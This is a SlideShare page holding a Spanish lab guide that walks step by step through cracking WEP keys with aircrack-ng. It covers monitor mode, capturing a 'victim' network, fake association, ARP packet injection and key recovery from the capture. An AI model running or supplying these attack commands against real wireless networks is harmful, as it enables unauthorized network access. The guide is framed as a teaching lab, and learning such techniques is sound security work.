Laboratorio hacking de contraseñas wep en redes wlan

1,974 views
1,820 views

Published on

Published in: Education
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,974
On SlideShare
0
From Embeds
0
Number of Embeds
501
Actions
Shares
0
Downloads
35
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Laboratorio hacking de contraseñas wep en redes wlan

  1. 1. Laboratorio Hacking de Contraseñas WEP en Redes WLANDuración60 MinutosRequisitos 1. Computador con Tarjeta de Red Wireless LAN. 2. Sistema Operativo GNU/Linux (Recomendación Backtrack). Valido en entorno de Virtualización 3. Aplicativos Instalados: aircrack-ng, macchanger.Nota: Si se hace uso de un entorno de virtualización se requiere de un adaptador Wireless LANUSB. Dado que las maquinas virtuales crean sus adaptadores de red como interfaces Ethernet.Desarrollo 1. Comprobar el nombre de los adaptadores de Red Inalámbricos, con: iwconfig o airmon-ng 2. Iniciar el modo monitor en la interfaz de red Wlan0 con el comando airmon-ng start wlan0 3. Ya tenemos nuestra tarjeta en Modo Monitor,"mon0" es el nombre de la interfaz en modo monitor. 4. Iniciarnos el proceso de escanear redes disponibles con el siguiente comando: airodump-ng mon0 5. Esto comenzará a mostrarnos las Redes Disponibles. Seleccionamos el BSSID de la red victima. 6. En este paso vamos a Capturar la Red Víctima para esto escribimos el siguiente comando: airodump-ng -w redes -c 11 --bssid 00:22:A4:30E:59 mon0 (La MAC presentada es ejemplo) donde, -w = especifica el nombre del archivo donde se guarda la captura de datos -c = especifica el canal de la Red --bssid = especifica Mac de Punto de Acceso mon0 = especifica la interfaz de la tarjeta de Red en Modo Monitor 7. Abrimos una segunda terminal (sin cerrar la primera) y escribimos lo siguiente: aireplay-ng -1 0 -a 00:22:A4:30E:59 mon0 Esto es para asociar su pc con la Red Víctima 8. Inyectamos paquetes a la red victima, para esto tecleamos lo siguiente: aireplay-ng -3 -b 00:22:A4:30E:59 mon0 Jesse Padilla Agudelo http://arpanetblog.com
  2. 2. Con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la columna #Data se incrementará rápidamente, y esperamos a que llegue a los 30000 datos para poder descifrar la contraseña.9. Cuando llegue a los 30,000 datos abrimos una tercera y última terminal y escribimos el comando: aircrack-ng redes-01.cap redes = archivo donde se guarda la captura (.cap) el mismo qué mencionamos en el paso 6 presionamos enter y aircrack nos presentara la llave Wep descifrada10. Key Found¡ (09:86:23:47:63)Nota: Si en algún punto requerimos especificar el canal para la interfaz mon0 lo hacemos conel comando airmon-ng start wlan0 –chanel # Jesse Padilla Agudelo http://arpanetblog.com

×